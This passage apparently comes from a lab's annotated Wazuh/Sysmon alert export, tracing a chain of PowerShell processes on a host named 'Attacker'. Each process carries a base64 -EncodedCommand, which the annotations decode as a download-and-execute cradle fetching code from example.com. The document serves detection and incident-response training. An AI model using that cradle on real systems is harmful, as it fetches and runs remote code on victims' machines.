No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:31.218 ProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} ProcessId: 2732 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcb0-680a-990a-000000000e00} ParentProcessId: 14564 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:31.218
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcb3-680a-9b0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2732
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcb0-680a-990a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14564
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:51.121+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:51.121+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534211.883639
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:34.8231642Z
When the event log wrote the record (UTC). Three clocks matter: eventdata.utcTime (Sysmon observed it), systemTime (logged), and timestamp (Wazuh raised the alert). Here the alert lands over a minute after the process started; that is collection lag, not attacker dwell time.

data.win.system.eventRecordID:  282011
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event: the Sysmon service, not the process being reported. The created process is data.win.eventdata.processId (6588).

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record lives in. Sysmon writes to its own Operational channel; logon and audit events live in Security.

data.win.system.computer:  Attacker
Hostname stamped on the record by the source's event log. It should match agent.name; a mismatch means forwarded events or an agent registered under another name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:33.635 ProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} ProcessId: 6588 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} ParentProcessId: 2732 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Rendered message text of the Sysmon Process Create event; every data.win.eventdata field below is parsed out of it. Keep it as the evidence copy and pivot on the parsed fields.

data.win.eventdata.utcTime:  2025-04-24 22:35:33.635
When Sysmon observed the process start (UTC). Use this, not timestamp, as the event's true time.

data.win.eventdata.processGuid:  {94294ddc-bcb5-680a-9e0a-000000000e00}
Sysmon's unique process identifier. Unlike a PID it is never reused, so it is the join key to this process's other Sysmon events (the FileCreate below, any network connections, its children).

data.win.eventdata.processId:  6588
PID of the new process. Windows recycles PIDs, so always pair it with processGuid.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Full path of the executable. The System32 path and the Microsoft version metadata below say this is the real Windows PowerShell 5.1 host; the problem is what it was told to run, not the binary.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource from the PE. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line, which tells you which known-good hash to compare against.

data.win.eventdata.description:  Windows PowerShell
Version-resource description string.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Version-resource product string.

data.win.eventdata.company:  Microsoft Corporation
Version-resource company string. These three are copied from the file, not verified; they are not a signature check.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name compiled into the binary. It survives renaming on disk, so an image name that does not match originalFileName is a masquerading indicator (T1036). Here they agree.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line. -EncodedCommand takes base64 of a UTF-16LE string, so decode it before judging it. This one decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): a download-and-execute cradle that fetches remote text and runs it in memory. example.com is a reserved test domain, consistent with a lab exercise rather than live C2, but the technique is what the rule keys on. The executable path appears twice and the parent command line below is identical, so PowerShell is re-launching itself with the same payload.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
Working directory of the new process: the user's profile root, so relative paths in the payload resolve there.

data.win.eventdata.user:  Attacker\Attcker1
Account the process runs as, DOMAIN\user form. The domain part equals the hostname, so this is a local account.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon identifier of the logon session the process belongs to.

data.win.eventdata.logonId:  0x26584
Windows Logon ID of that session. Search Security 4624 for the same Logon ID to see how, when and from where Attcker1 signed in.

data.win.eventdata.terminalSessionId:  1
Windows session number. 1 is an interactive console or RDP session; 0 is the services session. An interactive user (or an interactive backdoor) drove this, not a service.

data.win.eventdata.integrityLevel:  Medium
Token integrity level. Medium is a standard, non-elevated user; High would be an elevated admin token, System a service. A privilege escalation would show as a child at a higher level.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file (algorithms per the Sysmon config). Compare with the known-good hash for this build or a reputation service; the same hash appearing on every PowerShell start in this chain is expected for one binary.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcb3-680a-9b0a-000000000e00}
processGuid of the parent. Pivot on it to pull the parent's own Process Create event and see what launched the first PowerShell.

data.win.eventdata.parentProcessId:  2732
PID of the parent at the time of the spawn.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent executable. PowerShell spawning PowerShell is the pattern the rule keys on; for an interactive user a benign parent would be explorer.exe or a terminal host.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's command line: identical to the child's, same encoded payload. Walk the chain upward (PID 2732 and its parent) until the command line changes; that first hop is where the activity entered the host.

data.win.eventdata.parentUser:  Attacker\Attcker1
Account the parent runs as. Same user as the child, so no credential change happened between the hops.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:51.138+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer. Check the targetFilename before treating this as a tool drop: __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder is written (and removed again) by every Windows PowerShell start to probe AppLocker/WDAC script enforcement. It is a side-effect of the encoded-command PowerShell spawn above (same processGuid, PID 6588), not a downloaded executable; the severity belongs to that spawn.

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:51.138+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534211.891701
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event: Sysmon, so eventID uses Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon provider; identical on every host, so a stable filter key.

data.win.system.eventID:  11
Sysmon event type: 11 = FileCreate (a file was created or overwritten). Not a classic Security-log ID.

data.win.system.version:  2
Schema version of the FileCreate event; key parsers on eventID plus version.

data.win.system.level:  4
ETW level: 4 = Informational. Sysmon logs everything at this level.

data.win.system.task:  11
Task category. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:35.0179313Z
When the event log wrote the record (UTC). eventdata.utcTime is when Sysmon saw the file create; timestamp is when Wazuh raised the alert, roughly 75 s later, which is collection lag.

data.win.system.eventRecordID:  282012
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the event, not of the process that created the file (that is eventdata.processId, 6588).

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record lives in: Sysmon's own Operational channel.

data.win.system.computer:  Attacker
Hostname stamped on the record by the source; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:34.965 ProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} ProcessId: 6588 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4kimfx2r.qot.ps1 CreationUtcTime: 2025-04-24 22:35:34.965 User: Attacker\Attcker1"
Rendered message text of the Sysmon FileCreate event; the data.win.eventdata fields below are parsed out of it. Keep it as evidence, pivot on the parsed fields.

data.win.eventdata.utcTime:  2025-04-24 22:35:34.965
When Sysmon saw the file being created (UTC): 1.3 s after PID 6588 started.

data.win.eventdata.processGuid:  {94294ddc-bcb5-680a-9e0a-000000000e00}
Same processGuid as the Process Create alert above, so this is the encoded-command PowerShell (PID 6588) writing the file, not a new actor.

data.win.eventdata.processId:  6588
PID of the writing process.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
Process that created the file.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4kimfx2r.qot.ps1
Path of the created file. __PSScriptPolicyTest_<random>.<random>.ps1 in the user's Temp folder is written by every Windows PowerShell host at startup to test whether AppLocker or WDAC script enforcement applies, and is normally deleted again at once. It is a known benign artifact, not a dropped executable; it appears here only because the EID 1 process above started. Rule 92213's headline overstates this event. A real tool drop would be an .exe or .dll, or a script that stays on disk after the process exits.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:34.965
Creation timestamp on the file. Equal to utcTime means a brand-new file; an older value means an existing file was overwritten; a value that later moves backwards points to timestomping (Sysmon EID 2).

data.win.eventdata.user:  Attacker\Attcker1
Account that wrote the file; same local user as the process.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:51.760+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter. Decode the -EncodedCommand value first (base64 of UTF-16LE): it is IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. This process (PID 13524) is the third PowerShell in the chain 2732 → 6588 → 13524, every hop carrying the identical payload, so find what launched 2732 and check for an outbound connection (Sysmon EID 3) from any of the three.

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:51.760+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534211.894465
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event: Sysmon, so eventID uses Sysmon's numbering.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon provider; a stable filter key.

data.win.system.eventID:  1
Sysmon event type: 1 = Process Create. Not a classic Security-log ID.

data.win.system.version:  5
Schema version of the Process Create event; key parsers on eventID plus version.

data.win.system.level:  4
ETW level: 4 = Informational. Sysmon logs everything at this level.

data.win.system.task:  1
Task category. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:37.4234296Z
When the event log wrote the record (UTC). eventdata.utcTime is when Sysmon saw the spawn; timestamp is when Wazuh raised the alert, roughly 75 s later (collection lag).

data.win.system.eventRecordID:  282035
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that wrote the event, not of the process being reported (that is eventdata.processId, 13524).

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the record. Forensic detail only.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record lives in: Sysmon's own Operational channel.

data.win.system.computer:  Attacker
Hostname stamped on the record by the source; should match agent.name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:36.031 ProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00} ProcessId: 13524 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} ParentProcessId: 6588 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Rendered message text of the Sysmon Process Create event; the data.win.eventdata fields below are parsed out of it. Keep it as evidence, pivot on the parsed fields.

data.win.eventdata.utcTime:  2025-04-24 22:35:36.031
When Sysmon observed the process start (UTC): 2.4 s after its parent, PID 6588.

data.win.eventdata.processGuid:  {94294ddc-bcb8-680a-a00a-000000000e00}
Sysmon's unique, never-reused process identifier. Join key to this process's FileCreate (next alert), network connections and children.

data.win.eventdata.processId:  13524
PID of the new process; pair it with processGuid because PIDs are recycled.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Full path of the executable: the real Windows PowerShell 5.1 host.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource from the PE (Windows 11 24H2 / Server 2025 build line).

data.win.eventdata.description:  Windows PowerShell
Version-resource description string.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Version-resource product string.

data.win.eventdata.company:  Microsoft Corporation
Version-resource company string; copied from the file, not a signature check.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name compiled into the binary; matches the image name, so no masquerading (T1036).

